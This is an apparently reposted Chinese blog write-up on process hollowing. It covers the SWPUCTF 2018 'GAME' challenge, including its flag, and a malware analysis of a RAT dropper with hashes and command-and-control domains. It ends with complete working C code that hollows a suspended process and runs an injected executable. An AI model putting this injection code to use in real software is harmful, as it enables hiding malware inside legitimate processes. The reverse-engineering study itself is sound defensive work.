0x00 前言
最近做了一道18年swpuctf的題,分析了一個病毒,正巧都用到了傀儡行程,就想著把傀儡行程學習一下,本文權當個人的學習總結了一些網上的文章,如有錯誤,還請路過的大佬斧正,
0x01 SWPUCTF -- GAME
進入main函式
先獲取當前目錄,再拼上GAME.EXE
進入sub_4011D0
首先尋找資源,做準備作業,進入sub_4012C0
1)檢測PE結構
2) CreateProcessA 創建行程
3)GetThreadContext 得到行程背景關系資訊,用于下文計算基地址
4)sub_4016F0
到ntdll.dll里找到NtUnmapViewOfSection函式
5)VirtualAllocEx 跨行程,在目標行程申請空間
6)寫入檔案
7)SetThreadContext 恢復現場
8) 運行傀儡行程
我們來找找注入的程式
把GAME.EXE載入到010editor里,搜索"MZ"
dump出來,就是剛剛注入到傀儡行程的程式了,
我們把它命名為 game2.exe
載到IDA里分析
發現是D3D繪制
之后的解題與本文關系不大,這里直接把官方的WP搬運來了https://www.anquanke.com/post/id/168338#h3-16
通過字串[Enter]可以跟蹤到獲取輸入以及回傳上一層的地
這里用了’ – ’符來分割string,然后保存到vector中,并且判斷vector中string的個數是否是4以及每一個string的長度是否是4
接著傳入前面兩部分進行一次加密,可以根據常量識別出這是DES演算法,這里把DES的subkeys進行了一次移位,并且修改了sbox3開頭的5個位元組,然后把結尾結果減去0x10,之后再進行一個簡單的方程check,解方程可以得到另外兩部分是個常量,
DES部分可以網上找個標準的DES把這幾部分改一下就能解出FLAG:HOPE-UCAN-GOOD-GAME
小結
本題的sub_4012C0,就是在進行傀儡行程的撰寫,有必要仔細的說說傀儡行程
0x02 傀儡行程
文章: https://blog.csdn.net/darcy_123/article/details/102532411
首先使用CreateProcess傳入CREATE_SUSPENDED
創建一個掛起的行程,以下稱為傀儡行程,然后使用GetThreadContext讀取傀儡行程的背景關系資訊,通過DWORD
指標指向CONTEXT的EBX,DWORD + 8 位元組可以讀取到傀儡行程的基地址,然后計算傀儡行程的鏡像大小
然后把自己的資料讀入到傀儡行程內,設定CONTEXT背景關系入口點資訊EAX,并恢復行程主執行緒
上文已經寫得很詳細了,個人覺得重要的點
1)在CreateProcess時,注意環境問題 lpCurrentDirectory
BOOL CreateProcessA(
LPCSTR lpApplicationName,
LPSTR lpCommandLine,
LPSECURITY_ATTRIBUTES lpProcessAttributes,
LPSECURITY_ATTRIBUTES lpThreadAttributes,
BOOL bInheritHandles,
DWORD dwCreationFlags,
LPVOID lpEnvironment,
LPCSTR lpCurrentDirectory,
LPSTARTUPINFOA lpStartupInfo,
LPPROCESS_INFORMATION lpProcessInformation
);2) 計算基地址
context.Ebx + 8 = 基地址,因此從context.Ebx + 8的地址讀取4位元組的內容并轉化為DWORD型別,即是行程加載的基地址,
3) VirtualAllocEx時的權限問題
4)VirtualAllocEx重定位的問題
一般情況下,在寫入傀儡行程對應的檔案按照申請空間的首地址作為基地址進行“重定位”,這樣才能保證傀儡行程的正常運行,為了避免這一步操作,可以以傀儡行程PE檔案頭部的建議加載基地址作為VirtualAllocEx的lpAddress引數,申請與之對應的記憶體空間,然后以此地址作為基地址將傀儡行程寫入目標程式,就不會存在重定位問題,關于“重定位”的原理可以自行網路查找相關資料
我們來看看實際上病毒用到的傀儡行程
0x03 病毒分析
1.virusTotal
https://www.virustotal.com/gui/file/32db88982a0d0f92804c4c53ffd8555935871e23b35a9d362e037353cb6b44c5/details
MD5 ba46b18f05ab2b24df26e343dd32946b
SHA-1 34f07e131d4f147af96d262eee761582c6f0b1a4
SHA-256 32db88982a0d0f92804c4c53ffd8555935871e23b35a9d362e037353cb6b44c5
Vhash bf09954b6ff12217cd0df0f93c7488e4
SSDEEP 24576:yij8jlUoiuFhypnWmUOJ4H0zMY/lspoBbRzRrT9MUF5jawb:yDhUoMFUcvo6FlrT2wb
File type RAR
Magic RAR archive data, v1d, os: Win32
File size 893.13 KB (914570 bytes)
環境win7 x64
是一個.rar檔案
在虛擬機里改后綴為.rar
解壓:
可以簡單的發現一個偽裝成檔案夾的.exe
2.對18XXXXXXXXXXXX.exe分析
查殼
沒有
然后GUI,有界面的程式
用LoadPE去看一下區段,資源等資訊
看一下重定位
和資源
關注一下匯入表
0x0311 "WriteFile"
0x0038 "CreateFileA"
0x005F "DeleteFileA"
0x0240 "ReadFile"
0x0128 "GetFileSize"
0x020D "OpenFile"
0x0298 "SetFilePointer"
0x0048 "CreateProcessA
0x002B "CopyFileA"
0x00CC "GetACP"可能會新建新的檔案
IDA詳細分析
先搜字串
pavfnsvr.exe
sfctlcom.exe
后來看別人的分析,這兩個檔案是安全程式
IDA開始分析
開始時,一些準備作業,之后檢測版本號
申請堆,
釋放后,把申請的堆的句柄,放到40E968的位置
呼叫4057AE
檢測檔案的PE結構
主要是檢測PE結構,然后驗證目錄項要比14項多
之后回到start函式 sub_40624F
檢測的就是下圖紅框圈出來的那兩個
之后:
與SEH的高級使用有關
通過GetCommandLineA獲取當前檔案的路徑
"C:\Users\Administrator\Desktop\bingdu\1\bingdu\1\18xxxxxxxxxxxxxxxxxxxxxxxxxxxxx.EXE" 的地址存到了410268(00271F50)
sub_408D2C函式獲取環境資訊
獲取"ALLUSERSPROFILE=C:\ProgramData",
在將寬字符轉成多位元組
之后進入
V13為0x271fa6 ..(\洳..C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.;的指標
V6為10
進入函式:
首先會獲取當前行程已加載模塊的檔案的完整路徑
然后加載到緩沖區
把當前的目錄傳入402120
進入402120
會呼叫兩次401450
看一下401450
rep stosd:
在網上查了相關資料顯示:
/************************************************************/
lea edi,[ebp-0C0h]
mov ecx,30h
mov eax,0CCCCCCCCh
rep stos dword ptr es:[edi]
rep指令的目的是重復其上面的指令.ECX的值是重復的次數.
STOS指令的作用是將eax中的值拷貝到ES:EDI指向的地址.
首先獲取當前的路徑
打開檔案讀取
獲取windows的目錄
在源目錄生成.bak檔案
生成檔案夾
把檔案備份到"C:\Windows\Help\18xxxxxxxxxxxxxxxxxxxxxxxxxxxxx.bak"
在把原來的.bak洗掉
進入402680
首先找到生成的空檔案夾
在記憶體里讀取檔案 1.jpg
將1.jpg和.archd作為引數進入4046A0
拼出路徑
將j.jpg換成1.liz
按照路徑寫入檔案,再將1.liz換成1.jpg
回圈7次生成7張圖片
第8次,生成Thumbs.db檔案
之后把C:/Windows/Help里的備份洗掉
進入第二個401450
先找到程式獲取臨時目錄檔案路徑
然后拼出路徑
"C:\Users\ADMINI~1\AppData\Local\Temp\\rat.EXE"
如果存在直接打開,不存在就創建
之后createprocess
創建行程,運行rat.EXE
先拼出來byeyou.tmp的路徑
之后 遍歷所有行程,保證沒有sftlcom.exe與pavfnsur.exe
把原檔案(18XXXX.EXE)移動到byeyou.tmp
分析 rat.exe
沒有殼
自啟動(嫖的圖)
注冊表相關(嫖的圖)
去找ctfmon.exe的目錄
拼路徑 將rat.exe copy成ctfmon.exe
之后尋找資源
拼出"C:\Windows\system32\alg.exe"
作為引數扔到sub_4016D0運行
進入傀儡行程函式
創建掛起行程 && 保存現場,收集資訊
之后像上述ctf一樣找到注入到傀儡行程的.exe
Dump出來起名為abc.def
分析 abc.def
看一下字串
進入WinMain函式
首先進入sub_405BD0
先解密字串從advapt32.dl,呼叫需要的函式
提權
之后進入 sub_401720解密接下來需要的字串
回到WinMain
從KERNEL32.DLL找需要的函式
之后進入sub_405960
進入遠控函式
首先登入一個網站
保存回傳的資料
之后就沒辦法動調了
把回傳的資料按照自己定義的字符切割
進入405DB0函式,依舊是解密
接著分配套介面,連上
進入403190
開始從.Dll里提取需要的函式
1.
2.
3.
4.
5&6
之后傳入域名引數
獲得本機的ip
能不能ping得通
檢測系統版本
CPU資訊
作業系統版本
獲取磁盤資訊
對檔案操作
創建,讀
洗掉,重命名
移動
復制
列出行程 &&殺死行程
卸載
關機重啟
截屏
接著還會在傳入其他的兩個域名
cn.fetftp.nu "rt.softseek.org"
進入403190控制函式
0x04 代碼實作
https://blog.csdn.net/superchickenchicken/article/details/102552787?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-6.nonecase&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-6.nonecase
稍微修改了點去做別的用了
#include<stdio.h>
#include<windows.h>
#include<winbase.h>
struct _PROCESS_INFORMATION ProcessInfomation;
int main()
{
LPVOID pAlloc1;
LPVOID pAlloc2;
HANDLE hfile;
PIMAGE_NT_HEADERS pPeHeader;
PIMAGE_SECTION_HEADER pSectionHeader;
int lastError, ReadInfo = 0;
DWORD BytesRead = 0;
CONTEXT Context = { 0 };
Context.ContextFlags = CONTEXT_ALL;
char lpName[260];
//準備路徑
char Patch[] = "C:\\play.exe";//注入傀儡行程的.exe的路徑
LPCSTR p = (const char*)Patch;
//轉移檔案
//以掛起的方式創建傀儡行程,并獲取行程基址
STARTUPINFOA StartupInfo = { 0 };
PROCESS_INFORMATION ProcessInfomation = { 0 };
StartupInfo.cb = sizeof(StartupInfo);
GetModuleFileName(0, lpName, 520);
if (!CreateProcess(lpName, NULL, 0, 0, 0, CREATE_SUSPENDED, 0, 0, &StartupInfo, &ProcessInfomation)),
{
lastError = GetLastError();
printf("CreateProcess fail LastError:%d\n", lastError);
};
if (!GetThreadContext(ProcessInfomation.hThread, &Context))
{
lastError = GetLastError();
printf("GetThreadContext fail LastError:%d\n", lastError);
};
if (!ReadProcessMemory(ProcessInfomation.hProcess, (LPCVOID)(Context.Ebx + 0x8), &ReadInfo, 4, 0))
{
lastError = GetLastError();
printf("GetProcessImageBase fail LastError:%d\n", lastError);
//printf("%d\n", dwIO);
};
printf("ProcessImageBase:address 0x%x\n", ReadInfo);
// 把準備注入到傀儡行程的程式讀進記憶體
hfile = CreateFileA(p, GENERIC_READ | GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0);
//lastError = GetLastError();
//printf("%d\n", lastError);
pAlloc1 = VirtualAlloc(NULL, 0x70000, 0x3000, 4);//sucessful
//printf("%d", pAlloc1);
ReadFile(hfile, pAlloc1, 0x70000, &BytesRead, 0);
pPeHeader = (PIMAGE_NT_HEADERS)((PBYTE)pAlloc1 + ((PIMAGE_DOS_HEADER)pAlloc1)->e_lfanew);//sucessful
//printf("%d", pPeHeader);
pSectionHeader = (IMAGE_SECTION_HEADER*)((char*)&pPeHeader->OptionalHeader + pPeHeader->FileHeader.SizeOfOptionalHeader);//sucessful
//printf("%d", pSectionHeader);
//向傀儡行程申請記憶體空間
SetLastError(0);
pAlloc2 = VirtualAllocEx(ProcessInfomation.hProcess, (LPVOID)pPeHeader->OptionalHeader.ImageBase, pPeHeader->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, 64);
//printf("%d\n", pAlloc2);
if (!pAlloc2)
{
lastError = GetLastError();
printf("VirtualAllocEx fail LastError:%d\n", lastError);
TerminateProcess(ProcessInfomation.hProcess, 0);
return 0;
}
printf("AllocExBase: %x\n", pAlloc2);
//寫入PE頭
if (WriteProcessMemory(ProcessInfomation.hProcess, pAlloc2, pAlloc1, pPeHeader->OptionalHeader.SizeOfHeaders, 0))
{
printf("write PeHeader Success !\n");
}
//寫入節表,分節表寫入會使得程式展開在行程中
int NumofSection = pPeHeader->FileHeader.NumberOfSections;
for (int i = 0;i < NumofSection;i++)
{
LPVOID pAllocRawAddressSection = (char*)pAlloc1 + pSectionHeader->PointerToRawData;
LPVOID pAllocVirtualAddressSection = (char*)pPeHeader->OptionalHeader.ImageBase + pSectionHeader->VirtualAddress;
if (WriteProcessMemory(ProcessInfomation.hProcess, pAllocVirtualAddressSection, pAllocRawAddressSection, pSectionHeader->SizeOfRawData, 0))
{
printf("write the %d section success !\n", i + 1);
}
else
{
lastError = GetLastError();
printf("write the %d section fail ! lastError:%d\n", i + 1, lastError);
}
pSectionHeader++;
}
//設定傀儡行程的行程基址0x400000
if (WriteProcessMemory(ProcessInfomation.hProcess, (char*)Context.Ebx + 8, &pPeHeader->OptionalHeader.ImageBase, 4, 0))
{
printf("set Process ImageBase is 0x400000 success !\n");
}
//設定傀儡行程的行程OEP 為注入程式的OEP
Context.Eax = pPeHeader->OptionalHeader.ImageBase + pPeHeader->OptionalHeader.AddressOfEntryPoint;//設定入口點地址 一定別忘了加基址
if (SetThreadContext(ProcessInfomation.hThread, &Context))
{
printf("set Thread Context success !\n");
}
//恢復執行緒運行
if (ResumeThread(ProcessInfomation.hThread) != (DWORD)-1)
{
lastError = GetLastError();
printf("Resume Thread success ! \n");
}
system("pause");
return 0;
}
0x04總結
emmmm不知道說啥,溜了
轉載請註明出處,本文鏈接:https://www.uj5u.com/qianduan/161911.html
標籤:其他